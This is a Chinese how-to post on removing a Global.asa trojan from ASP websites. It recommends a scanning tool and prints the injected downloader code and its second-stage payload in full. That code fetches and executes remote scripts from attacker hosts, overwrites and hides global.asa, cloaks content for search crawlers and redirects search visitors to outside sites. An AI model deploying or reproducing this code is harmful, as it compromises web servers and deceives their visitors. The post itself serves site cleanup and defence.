网站中Global.asa木马的快速清除方法
解决办法: <br />1、用青云团队开发的网站木马清理专家全面扫描服务器上的网站,网站木马清理专家下载地址:https://www.jb51.net/softs/12771.html<br />2、如果这时木马还是存在,用我们的网站木马清理专家的快速查马功能快速查杀by*aming或aming特征码,如下图所示: <br /><img border="0" alt="" width="411" height="292" src="https://img.jbzj.com/do/uploads/userup/1103/2H01T11L2.jpg" /><br />3、关闭服务器上的缩略图功能 方法参考 https://www.jb51.net/os/windows/Win2003/34960.html<br />根源: <br />这次用户中的是下载者类的木马,黑客通过网站上传漏洞上在网站根目录的foot.asp下插入了以下代码: <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode2"> <br /><% <br />'by*aming <br />Function Gethtml(url) <br />Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP") <br />ObjXMLHTTP.Open "GET",url,False <br />ObjXMLHTTP.setRequestHeader "User-Agent",url <br />ObjXMLHTTP.send <br />Gethtml=ObjXMLHTTP.responseBody <br />Set ObjXMLHTTP=Nothing <br />set objStream = Server.CreateObject("Adodb.Stream") <br />objStream.Type = 1 <br />objStream.Mode =3 <br />objStream.Open <br />objStream.Write Gethtml <br />objStream.Position = 0 <br />objStream.Type = 2 <br />objStream.Charset = "gb2312" <br />Gethtml = objStream.ReadText <br />objStream.Close <br />set objStream=Nothing <br />End Function <br />execute(Gethtml("http://www.pornhome.com/dy7749/xmlasaquan.txt")) <br />%> <br /></div><br />清掉这段代码即可解决问题,网站木马清理专家查杀结果如下图所示! <br /><img border="0" alt="" width="634" height="498" src="https://img.jbzj.com/do/uploads/userup/1103/2H0214C0V.jpg" /><br />xmlasaquan.txt的内容如下: <br /><br><div class="msgheader"><div class="right"><span style="CURSOR: pointer" class="copybut"><u>复制代码</u></span></div>代码如下:</div><div class="msgborder" id="phpcode3"> <br />'<html><head><script>function clear(){Source=document.body.firstChild.data;document.open();document.close();document.title="";document.body.innerHTML=Source;}</script></head><body onload=clear()> <br />'<meta http-equiv=refresh content=0;URL=about:blank><script>eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d=k||c}k=}];e=function(){return'\\w+'};c=1};while(c--){if(k){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k)}}return p}('0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split('|'),0,{}))</script> <br />'by*aming <br />Server.ScriptTimeout=600 <br />Public Function createasa(ByVal Content) <br />On Error Resume Next <br />Set fso = Server.CreateObject("scripting.filesystemobject") <br />set f=fso.Getfile("//./" & Server.MapPath("/global.asa")) <br />f.Attributes=0 <br />Set Obj = Server.CreateObject("adod" & "b.S" & "tream") <br />Obj.Type = 2 <br />Obj.open <br />Obj.Charset = "gb2312" <br />Obj.Position = Obj.Size <br />Obj.writetext = Content <br />Obj.SaveToFile "//./" & Server.MapPath("/global.asa"),2 <br />Obj.Close <br />Set Obj = Nothing <br />f.Attributes=1+2+4 <br />set f=Nothing <br />Set fso = Nothing <br />End Function <br />Public Function GetHtml(url) <br />Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP") <br />ObjXMLHTTP.Open "GET",url,False <br />ObjXMLHTTP.setRequestHeader "User-Agent",url <br />ObjXMLHTTP.send <br />GetHtml=ObjXMLHTTP.responseBody <br />Set ObjXMLHTTP=Nothing <br />set objStream = Server.CreateObject("Adodb.Stream") <br />objStream.Type = 1 <br />objStream.Mode =3 <br />objStream.Open <br />objStream.Write GetHtml <br />objStream.Position = 0 <br />objStream.Type = 2 <br />objStream.Charset = "gb2312" <br />GetHtml = objStream.ReadText <br />objStream.Close <br />End Function <br />Function check(user_agent) <br />allow_agent=split("Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST-WebCrawler,MSNBOT,Slurp",",") <br />check_agent=false <br />For agenti=lbound(allow_agent) to ubound(allow_agent) <br />If instr(user_agent,allow_agent(agenti))>0 then <br />check_agent=true <br />exit for <br />end if <br />Next <br />check=check_agent <br />End function <br />Function CheckRobot() <br />CheckRobot = False <br />Dim Botlist,i,Repls <br />Repls = request.ServerVariables("http_user_agent") <br />Krobotlist = "Baiduspider|Googlebot" <br />Botlist = Split(Krobotlist,"|") <br />For i = 0 To Ubound(Botlist) <br />If InStr(Repls,Botlist(i)) > 0 Then <br />CheckRobot = True <br />Exit For <br />End If <br />Next <br />If Request.QueryString("admin")= "1" Then Session("ThisCheckRobot")=1 <br />If Session("ThisCheckRobot") = 1 Then CheckRobot = True <br />End Function <br />Function CheckRefresh() <br />CheckRefresh = False <br />Dim Botlist,i,Repls <br />Krobotlist = "baidu|google|sogou|soso|youdao" <br />Botlist = Split(Krobotlist,"|") <br />For i = 0 To Ubound(Botlist) <br />If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then <br />CheckRefresh = True <br />Exit For <br />End If <br />Next <br />End Function <br />Sub sleep() <br />If response.IsClientConnected=true then <br />Response.Flush <br />else <br />response.end <br />end if <br />End Sub <br />If CheckRefresh=true Then <br />cnnbd=lcase(request.servervariables("HTTP_HOST")) <br />response.redirect("http://www.82767.com/?"&cnnbd&"") <br />'Response.Write("<a href=http://www.82767.com><font _fcksavedurl="http://www.82767.com><font" color=#FF0000>如果您的浏览器不支持跳转,请点击进入>>>>>></font></a><div style=display:none><script src=http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script _fcksavedurl="http://count11.51yes.com/click.aspx?id=114814173&logo=12></script></div><script" src=http://js.568tea.com/44.js></script><script src=http://js.37548.com/44.js></script>") <br />response.end <br />end If <br />user_agent=Request.ServerVariables("HTTP_USER_AGENT") <br />if check(user_agent)=true then <br />body=GetHtml("http://fudu.qpedu.cn/xml/prn/con.2.asp?domain="&strHost&"&ua="&server.URLEncode(request.ServerVariables("HTTP_USER_AGENT"))&"") <br />response.write body <br />response.end <br />else <br />asa=GetHtml("http://www.pornhome.com/dy7749/codequan.txt") <br />if instr(asa,"by*aming")>0 then <br />createasa(asa) <br />end if <br />ScriptAddress=Request.ServerVariables("SCRIPT_NAME") <br />namepath=Server.MapPath(ScriptAddress) <br />If Len(Request.QueryString) > 0 Then <br />ScriptAddress = ScriptAddress & "?" & Request.QueryString <br />end if <br />geturl ="http://"& Request.ServerVariables("http_host") & ScriptAddress <br />geturl =LCase(geturl) <br />'response.write replace(namepath,server.MapPath("/"),"") <br />'response.end <br />'if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr(LCase(Request.ServerVariables("http_host")),"gov.cn")=0 and instr(LCase(Request.ServerVariables("http_host")),"edu.cn")=0 and <br />if instr(geturl,"http://"& Request.ServerVariables("http_host") &"/index.asp")=0 and instr(geturl,"http://"& Request.ServerVariables("http_host") &"/")=0 and instr(LCase(Request.ServerVariables("HTTP_REFERER")),LCase(Request.ServerVariables("http_host")))<=0 then <br />agent = lcase(request.servervariables("http_user_agent")) <br />referer = LCase(Request.ServerVariables("HTTP_REFERER")) <br />bot = "" <br />Amll = "" <br />if instr(agent, "+") > 0 then bot = agent <br />if instr(agent, "-") > 0 then bot = agent <br />if instr(agent, "http") > 0 then bot = agent <br />if instr(agent, "spider") > 0 then bot = agent <br />if instr(agent, "bot") > 0 then bot = agent <br />if instr(agent, "linux") > 0 then bot = agent <br />if instr(agent, "baidu") > 0 then bot = agent <br />if instr(agent, "google") > 0 then bot = "nobot" <br />if instr(agent, "yahoo") > 0 then bot = "nobot" <br />if instr(agent, "msn") > 0 then bot = "nobot" <br />if instr(agent, "alexa") > 0 then bot = "nobot" <br />if instr(agent, "sogou") > 0 then bot = "nobot" <br />if instr(agent, "youdao") > 0 then bot = "nobot" <br />if instr(agent, "soso") > 0 then bot = "nobot" <br />if instr(agent, "iask") > 0 then bot = "nobot" <br />if bot="nobot" then <br />'Call WriteErr <br />'response.end <br />end if <br />Call sleep() <br />end if <br />end if <br />'</body></html> <br /></div>
頁:
[1]